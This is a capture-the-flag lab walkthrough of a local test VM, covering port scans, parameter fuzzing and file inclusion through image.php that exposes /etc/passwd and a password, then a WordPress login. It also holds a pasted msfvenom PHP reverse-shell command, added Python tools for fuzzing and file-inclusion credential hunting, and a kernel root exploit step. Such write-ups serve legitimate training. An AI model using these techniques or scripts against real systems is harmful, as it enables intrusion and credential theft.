Information gathering

Locating the target host

$ sudo nmap -sn 192.168.205.0/24                                          
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 07:49 EDT
Nmap scan report for 192.168.205.1 (192.168.205.1)
Host is up (0.00058s latency).
MAC Address: 00:50:56:C0:00:01 (VMware)
Nmap scan report for 192.168.205.2 (192.168.205.2)
Host is up (0.00014s latency).
MAC Address: 00:50:56:F7:4F:9C (VMware)
Nmap scan report for 192.168.205.137 (192.168.205.137)
Host is up (0.00039s latency).
MAC Address: 00:0C:29:32:80:FE (VMware)
Nmap scan report for 192.168.205.254 (192.168.205.254)
Host is up (0.00029s latency).
MAC Address: 00:50:56:FD:69:37 (VMware)
Nmap scan report for 192.168.205.128 (192.168.205.128)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.97 seconds

or

$ sudo arp-scan -l              
Interface: eth0, type: EN10MB, MAC: 00:0c:29:e7:49:b2, IPv4: 192.168.205.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.205.1 00:50:56:c0:00:01 VMware, Inc.
192.168.205.2 00:50:56:f7:4f:9c VMware, Inc.
192.168.205.137 00:0c:29:32:80:fe VMware, Inc.
192.168.205.254 00:50:56:fd:69:37 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.998 seconds (128.13 hosts/sec). 4 responded

So .137 is the target: .1, .2 and .254 are VMware host/NAT addresses, and .128 is our own Kali box (the one arp-scan reports as its own interface).

First a full TCP port scan, saving the results:

sudo nmap -sT --min-rate 10000 -p- 192.168.205.137 -oA nmapscan/tcp
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 07:53 EDT
Nmap scan report for 192.168.205.137 (192.168.205.137)
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:32:80:FE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

Two ports are open. As a matter of good habit (for the case where a box has many open ports), extract the port list from the saved output rather than typing it by hand. One caveat about the output above: "Not shown: 998 closed tcp ports" is the wording of a default top-1000 scan, while a genuine -p- run reports 65533, so the pasted output came from a run without -p-; the two open ports are the same either way.

grep open nmapscan/tcp.nmap|awk -F'/' '{print($1)}'|paste -sd ","

22,80

Now a full service-version, default-script and OS scan against just those two ports:

sudo nmap -sT -sV -sC -O -p22,80 192.168.205.137 -oA nmapscan/web                        
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 07:57 EDT
Nmap scan report for 192.168.205.137 (192.168.205.137)
Host is up (0.00092s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
MAC Address: 00:0C:29:32:80:FE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds

At the same time, scan the most common UDP ports:

$ sudo nmap -sU --top-ports 20 192.168.205.137 -oA nmapscan/udp
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 07:59 EDT
Nmap scan report for 192.168.205.137 (192.168.205.137)
Host is up (0.00086s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp open|filtered ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:32:80:FE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 23.42 seconds

Two ports come back as open|filtered: 68/udp (dhcpc) and 631/udp (ipp). For UDP that state only means nmap received no reply at all, neither a datagram nor an ICMP port-unreachable, which is exactly what a firewalled or silently dropped port looks like too. So these are possibly open, not confirmed.
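
Added example, not from the original writeup: a small Python parser for the port lines of nmap's .nmap output. It does what the grep/awk/paste one-liner earlier does, but keeps tcp and udp apart and treats open|filtered as its own class, so the UDP "possibly open" ports are only included on request. The sample inputs are excerpts of the two scans shown above; the file name in the usage comment is assumed.

```python
import re
from typing import Dict, List

# Port lines in nmap's normal (.nmap) output look like
#   22/tcp  open           ssh
#   68/udp  open|filtered  dhcpc
PORT_LINE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(open\|filtered|open|closed|filtered)\s+(\S+)",
    re.MULTILINE,
)


def open_ports(nmap_text: str, include_open_filtered: bool = False) -> Dict[str, List[int]]:
    """Return {"tcp": [...], "udp": [...]} of the ports nmap reported open.

    "open|filtered" means nmap got no answer at all (no ICMP port-unreachable).
    For UDP that is also what a firewalled port looks like, so such ports are
    only included when the caller explicitly asks for them.
    """
    found = {"tcp": set(), "udp": set()}
    for port, proto, state, _service in PORT_LINE.findall(nmap_text):
        if state == "open" or (include_open_filtered and state == "open|filtered"):
            found[proto].add(int(port))
    return {proto: sorted(ports) for proto, ports in found.items()}


def port_arg(ports: List[int]) -> str:
    """Format a port list for nmap's -p, e.g. [22, 80] -> "22,80"."""
    return ",".join(str(p) for p in ports)


# Excerpts of the two scans shown in this writeup, used as sample input.
TCP_SCAN = """\
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:32:80:FE (VMware)
"""

UDP_SCAN = """\
PORT STATE SERVICE
53/udp closed domain
68/udp open|filtered dhcpc
161/udp closed snmp
631/udp open|filtered ipp
"""


if __name__ == "__main__":
    import sys
    # Usage: python3 ports.py nmapscan/tcp.nmap   (no argument: the samples above)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else TCP_SCAN + UDP_SCAN
    strict = open_ports(text)
    loose = open_ports(text, include_open_filtered=True)
    for proto in ("tcp", "udp"):
        print(f"{proto}: open={port_arg(strict[proto]) or '-'}; "
              f"with open|filtered={port_arg(loose[proto]) or '-'}")
```

Feeding it nmapscan/tcp.nmap gives "22,80" for the -p argument; the UDP file gives nothing unless open|filtered is included, which is the right default when deciding what to spend time on.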

Run the NSE vuln scripts against the open ports and, in parallel, start a directory scan of port 80:

$ sudo nmap --script=vuln -p80,22 192.168.205.137 -oA nmapscan/vuln   
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 08:04 EDT
Nmap scan report for 192.168.205.137 (192.168.205.137)
Host is up (0.00042s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /wordpress/: Blog
|_ /wordpress/wp-login.php: Wordpress login page.
MAC Address: 00:0C:29:32:80:FE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 174.19 seconds

Directory scan results (dirsearch output, hits only):

[08:06:03] 200 - 131B - /dev
[08:06:06] 200 - 137B - /image.php

[08:06:18] 200 - 1KB - /wordpress/wp-login.php
[08:06:18] 200 - 4KB - /wordpress/

First, /dev:

$ sudo curl 192.168.205.137/dev
hello,

now you are at level 0 stage.

In real life pentesting we should use our tools to dig on a web very hard.

Happy hacking.

Just a hint: use tools and dig hard at the web app. So look for leftover files. Run dirb again, this time asking it to try .zip and .txt extensions as well:

sudo dirb http://192.168.205.137 -X .zip,.txt -o nmapscan/file

-----------------

DIRB v2.22

By The Dark Raver
-----------------

OUTPUT_FILE: nmapscan/file
START_TIME: Mon Mar 31 08:36:15 2025
URL_BASE: http://192.168.205.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.zip,.txt) | (.zip)(.txt) [NUM = 2]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.205.137/ ----

+ http://192.168.205.137/secret.txt (CODE:200|SIZE:412)


-----------------

END_TIME: Mon Mar 31 08:36:21 2025
DOWNLOADED: 9224 - FOUND: 1

A new result:

sudo curl 192.168.205.137/secret.txt
Looks like you have got some secrets.

Ok I just want to do some help to you.

Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web



//see the location.txt and you will get your next move//

The hint says to fuzz every PHP page found so far for a parameter, and that location.txt shows the next move. First enumerate the .php files with dirb:

sudo dirb http://192.168.205.137 -X .php -o nmapscan/file

-----------------

DIRB v2.22

By The Dark Raver
-----------------

OUTPUT_FILE: nmapscan/file
START_TIME: Mon Mar 31 08:48:03 2025
URL_BASE: http://192.168.205.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.205.137/ ----
+ http://192.168.205.137/image.php (CODE:200|SIZE:147)

+ http://192.168.205.137/index.php (CODE:200|SIZE:136)


-----------------

END_TIME: Mon Mar 31 08:48:06 2025
DOWNLOADED: 4612 - FOUND: 2

Fuzz index.php for a GET parameter name. --hh 136 hides every response of 136 characters, which is the size index.php returns when it ignores the parameter (dirb reported SIZE:136 for it above), so only names the page actually reacts to get through. One survives: file.

sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.205.137/index.php?FUZZ=something
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************

* Wfuzz 3.1.0 - The Web Fuzzer *

********************************************************

Target: http://192.168.205.137/index.php?FUZZ=something
Total requests: 951

=====================================================================

ID Response Lines Word Chars Payload
=====================================================================

000000341: 200 7 L 19 W 206 Ch "file"

Total time: 0
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 0
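
Added example, not part of the original writeup: the parameter discovery wfuzz does above, written out in Python so the filtering logic is explicit. Instead of a hard-coded --hh length it calibrates the baseline with a parameter name that does not exist and flags any name whose status or response length differs. The network fetcher is plain urllib; fake_index_php is a constructed stand-in for index.php so the logic can run offline; the target URL, wordlist path and candidate names are assumptions.

```python
import secrets
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Tuple

# A fetcher returns (status, body). http_fetch talks to the target; the
# constructed fake_index_php below lets the logic run offline.
Fetcher = Callable[[str], Tuple[int, str]]


def http_fetch(url: str, timeout: float = 5.0) -> Tuple[int, str]:
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:  # 4xx/5xx responses still have a body
        return err.code, err.read().decode("utf-8", errors="replace")


def fuzz_params(page_url: str, names: List[str], fetch: Fetcher = http_fetch,
                value: str = "something") -> Dict[str, Tuple[int, int]]:
    """Return {name: (status, length)} for each candidate parameter name whose
    response differs from the baseline.

    The baseline is the response to a parameter name that certainly does not
    exist. It plays the role of wfuzz's --hh <length>, except that the length
    is measured on the fly instead of read off a first run, and the status
    code is compared as well.
    """
    bogus = "z" + secrets.token_hex(6)  # assumed not to be a real parameter
    base_status, base_body = fetch(f"{page_url}?{urllib.parse.urlencode({bogus: value})}")
    base_sig = (base_status, len(base_body))
    hits: Dict[str, Tuple[int, int]] = {}
    for name in names:
        status, body = fetch(f"{page_url}?{urllib.parse.urlencode({name: value})}")
        sig = (status, len(body))
        if sig != base_sig:
            hits[name] = sig
    return hits


# Constructed stand-in for index.php as observed above: a fixed page, plus one
# extra line only when a "file" parameter is present.
_TEMPLATE = ("<html>\n<title>HacknPentest</title>\n<body>\n"
             "<img src='hacknpentest.png' alt='hnp security' width=\"1300\" height=\"595\" />\n"
             "</body>\n")


def fake_index_php(url: str) -> Tuple[int, str]:
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    body = _TEMPLATE
    if "file" in query:
        body += "Do something better <br>you are digging wrong file"
    return 200, body + "</html>\n"


if __name__ == "__main__":
    import sys
    # Usage: python3 paramfuzz.py http://192.168.205.137/index.php wordlist.txt
    # (no arguments: runs against the offline stand-in)
    if len(sys.argv) == 3:
        names = [w.strip() for w in open(sys.argv[2]) if w.strip()]
        hits = fuzz_params(sys.argv[1], names)
    else:
        hits = fuzz_params("http://192.168.205.137/index.php",
                           ["id", "page", "file", "path", "dir"], fetch=fake_index_php)
    for name, (status, length) in hits.items():
        print(f"{name}: {status} {length} chars")
```

Comparing (status, length) rather than length alone also catches parameters that only change the status code, and measuring the baseline per run avoids the classic mistake of reusing a --hh value from a page that has since changed.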
sudo curl http://192.168.205.137/index.php?file                                                                                 
<html>

<title>HacknPentest</title>

<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>

Do something better <br><br><br><br><br><br>you are digging wrong file</html>

It says we are digging the wrong file. secret.txt told us to look at location.txt, so pass that as the value:

$ sudo curl http://192.168.205.137/index.php?file=location.txt
<html>

<title>HacknPentest</title>

<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>

Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>

It says to use the parameter secrettier360 on some other PHP page. The other one we found is image.php:

 sudo curl http://192.168.205.137/image.php?secrettier360=
<html>

<title>HacknPentest</title>

<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br></html>

http://192.168.205.137/image.php?secrettier360=/etc/passwd

The parameter is a local file inclusion: whatever path is supplied gets included and echoed into the page (the /etc/passwd output is not reproduced here). It shows a root account and a user victor, both likely usable, and the saket entry's GECOS field carries a hint:

saket:x:1001:1001:find password.txt file in my directory:/home/saket:

http://192.168.205.137/image.php?secrettier360=/home/saket/password.txt

follow_the_ippsec
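
Added example, not from the original writeup, for the two LFI steps above: read a file through image.php?secrettier360=, peel the page template off the response, parse /etc/passwd to shortlist accounts, then try a few well-known filenames in each home directory (the GECOS hint pointed at password.txt). The template layout (fixed prefix and suffix around the included file) and the candidate filenames are assumptions; fake_image_php is a constructed stand-in for the target with a constructed /etc/passwd whose saket line is the one quoted above.

```python
import re
import urllib.parse
import urllib.request
from typing import Callable, Dict, List

Fetcher = Callable[[str], str]


def http_fetch(url: str, timeout: float = 5.0) -> str:
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def lfi_read(page_url: str, param: str, path: str, fetch: Fetcher = http_fetch) -> str:
    """Request page_url?param=path and return the raw response body."""
    return fetch(f"{page_url}?{urllib.parse.urlencode({param: path})}")


def included_part(body: str, baseline: str) -> str:
    """Keep only what include() added: drop the lines the response shares with
    the baseline (empty parameter) at the bottom, then at the top.

    Assumes the included file is emitted between a fixed template prefix and
    suffix and ends with a newline; a last line without one stays glued to the
    template's next line. Matching the bottom first bounds the top match to
    the template's own length, so a file whose first line happens to equal
    the template's next line is still cut correctly.
    """
    b, t = body.splitlines(keepends=True), baseline.splitlines(keepends=True)
    tail = 0
    while tail < min(len(b), len(t)) and b[-1 - tail] == t[-1 - tail]:
        tail += 1
    head, limit = 0, min(len(b), len(t)) - tail
    while head < limit and b[head] == t[head]:
        head += 1
    return "".join(b[head:len(b) - tail])


PASSWD_RE = re.compile(
    r"([a-z_][a-z0-9_-]*):([^:\s]*):(\d+):(\d+):([^:\n]*):([^:\s]*):([^\s:<]*)")


def parse_passwd(text: str) -> List[Dict]:
    """Pull passwd entries out of text; HTML around them does not matter."""
    users = []
    for m in PASSWD_RE.finditer(text):
        name, _pw, uid, gid, gecos, home, shell = m.groups()
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def candidate_users(users: List[Dict]) -> List[Dict]:
    """root plus ordinary login accounts (uid 1000-59999). System accounts and
    nobody (65534) are skipped; an empty shell is kept, as with saket above."""
    return [u for u in users if u["uid"] == 0 or 1000 <= u["uid"] < 60000]


def hunt_home_files(page_url: str, param: str, users: List[Dict],
                    filenames=("password.txt", "user.txt", ".bash_history"),
                    fetch: Fetcher = http_fetch) -> Dict[str, Dict[str, str]]:
    """Try each filename in every user's home through the LFI and return
    {user: {filename: content}} for the ones that came back non-empty."""
    baseline = lfi_read(page_url, param, "", fetch)  # template only, as seen above
    found: Dict[str, Dict[str, str]] = {}
    for u in users:
        for fn in filenames:
            content = included_part(lfi_read(page_url, param, f"{u['home']}/{fn}", fetch), baseline)
            if content:
                found.setdefault(u["name"], {})[fn] = content
    return found


# Constructed stand-in for image.php: template prefix, included file, template
# suffix. The /etc/passwd is constructed too, except the saket line, which is
# the one quoted in this writeup.
_PREFIX = ("<html>\n<title>HacknPentest</title>\n<body>\n"
           "<img src='hacknpentest.png' alt='hnp security' width=\"1300\" height=\"595\" /></p></p></p>\n"
           "</body>\n")
_SUFFIX = "finaly you got the right parameter<br><br><br><br></html>\n"
_FILES = {
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
        "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
        "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
        "victor:x:1000:1000:victor,,,:/home/victor:/bin/bash\n"
        "saket:x:1001:1001:find password.txt file in my directory:/home/saket:\n"
    ),
    "/home/saket/password.txt": "follow_the_ippsec\n",
}


def fake_image_php(url: str) -> str:
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query, keep_blank_values=True)
    path = query.get("secrettier360", [""])[0]
    return _PREFIX + _FILES.get(path, "") + _SUFFIX


if __name__ == "__main__":
    import sys
    # Usage: python3 lfi.py http://192.168.205.137/image.php secrettier360
    # (no arguments: runs against the offline stand-in)
    if len(sys.argv) == 3:
        page, param, fetch = sys.argv[1], sys.argv[2], http_fetch
    else:
        page, param, fetch = "http://192.168.205.137/image.php", "secrettier360", fake_image_php
    users = candidate_users(parse_passwd(lfi_read(page, param, "/etc/passwd", fetch)))
    for u in users:
        print(f"{u['name']:10} uid={u['uid']:<6} home={u['home']:14} gecos={u['gecos']!r}")
    for user, files in hunt_home_files(page, param, users, fetch=fetch).items():
        for fn, content in files.items():
            print(f"--- {user}: {fn}\n{content.rstrip()}")
```

The passwd regex is deliberately unanchored because the included file arrives wrapped in HTML; the uid filter is what turns a 30-line passwd into the three accounts worth caring about (root, victor, saket), and the GECOS text is printed because, as here, it is sometimes where the hint lives.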

That looks like a password. SSH as victor with it fails. Trying it on the WordPress login page instead works:

victor:follow_the_ippsec

Logged into the WordPress backend, which reports itself as WordPress 6.7.2.

Looking for a way to run code: in the theme editor, the theme file secret.php is writable, so a PHP shell can be pasted into it. Generate one with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.205.128 LPORT=7777 -o mshell.php

Paste the contents of mshell.php into secret.php and save. Then start a listener in msfconsole (exploit/multi/handler with the same payload, LHOST and LPORT) and request secret.php to get the reverse shell back.

Now a shell as www-data. Check sudo rights first:

sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
cd
cd /home
ls
saket
victor
cd saket
ls
enc
password.txt
user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456

That is the first flag.

Before moving on, note the sudo -l result above: www-data may run /home/saket/enc as root without a password. A NOPASSWD root binary sitting in a user's home directory is a privilege-escalation candidate in its own right and worth examining; this writeup takes the kernel route instead.

uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 G

The kernel is old (4.10.0-28-generic, Ubuntu 16.04, built July 2017), so check for a kernel privilege escalation. Exploit-DB entry 45010 (CVE-2017-16995, an eBPF verifier bug in Linux kernels before 4.13.9, which includes this Ubuntu 16.04 kernel) fits.

Fetch it on the attacking machine (searchsploit can copy it locally), serve it over a local HTTP server, pull it onto the target with wget, and compile it on the target with gcc (the target needs a compiler for this). Running it gives a root shell:

cat root.txt
b2b17036da1de94cfb024540a8e7075a